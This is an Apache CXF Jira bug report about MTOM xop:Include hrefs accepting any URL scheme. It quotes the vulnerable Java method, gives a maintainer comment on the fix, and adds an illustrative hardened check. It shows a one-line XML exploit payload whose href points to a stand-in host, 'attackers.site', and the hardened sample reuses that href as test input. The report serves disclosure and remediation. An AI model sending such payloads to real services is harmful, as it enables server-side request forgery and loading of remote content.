[ https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17649529#comment-17649529 ]

Andriy Redko edited comment on CXF-8706 at 12/20/22 1:58 AM:
-------------------------------------------------------------

[~bergers] the fix disables arbitrary data sources by default, w/o MTOM
enabled. Regarding the usage of `SOAPBinding.isMTOMEnabled()`, I am not
sure; it seems like Apache CXF has an alternative `Message.MTOM_ENABLED`
contextual property to control this behavior, thank you.


> CXF MTOM handler allow content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled, 
> Unmarshaller allows XOP Include tag to have href attributes that allow any 
> protocols.  According to the W3C MTOM spec, only "cid:" should be allowed for 
> href scheme.
> The affected call stack is:
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
>     MTOMDecorator.startElement(TagName) line: 70
> The source code is:
>     public static DataSource getAttachmentDataSource(String contentId, Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4), StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else { // should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
>  
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload"
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>
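As an added illustration (not Apache CXF's own patch), a hardened variant of the scheme check in the quoted code: an xop:Include href is resolved only as a cid: reference or a bare content id, and any href carrying a URL scheme is rejected unless the hypothetical allowExternal flag, standing in for an opt-in contextual property like the one discussed in the comment, is set. The attachment map and the list of hrefs are constructed sample data.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Map;

// Hypothetical hardened resolver for xop:Include hrefs; not Apache CXF's fix.
public final class XopHrefCheck {

    // Map an href to the content id to look up among the message attachments.
    // Only "cid:" references and bare content ids are accepted by default; an
    // href with a URL scheme is rejected unless allowExternal (a stand-in for
    // a contextual property) is true, so the server never fetches a URL the
    // sender chose.
    static String contentIdFor(String href, boolean allowExternal) {
        if (href.startsWith("cid:")) {
            // The cid: payload is percent-encoded, e.g. "part1%40example.org".
            return URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);
        }
        if (href.indexOf("://") == -1) {
            return href; // bare content id, kept for compatibility
        }
        if (!allowExternal) {
            throw new IllegalArgumentException(
                "xop:Include href must be a cid: reference, got: " + href);
        }
        return href; // caller may open the URL only after explicitly opting in
    }

    public static void main(String[] args) {
        // Constructed sample attachments keyed by content id.
        Map<String, byte[]> attachments = Map.of(
            "part1@example.org", "hello".getBytes(StandardCharsets.UTF_8));
        String[] hrefs = {
            "cid:part1%40example.org",              // valid XOP reference
            "part1@example.org",                    // bare content id
            "http://attackers.site/exploit/payload" // href from the report above
        };
        for (String href : hrefs) {
            try {
                String id = contentIdFor(href, false);
                boolean found = attachments.containsKey(id);
                System.out.println(href + " -> " + id + (found ? " (found)" : " (missing)"));
            } catch (IllegalArgumentException e) {
                System.out.println(href + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

With the flag left false, the first two hrefs resolve to the attachment and the third is rejected before any network access is attempted.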



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
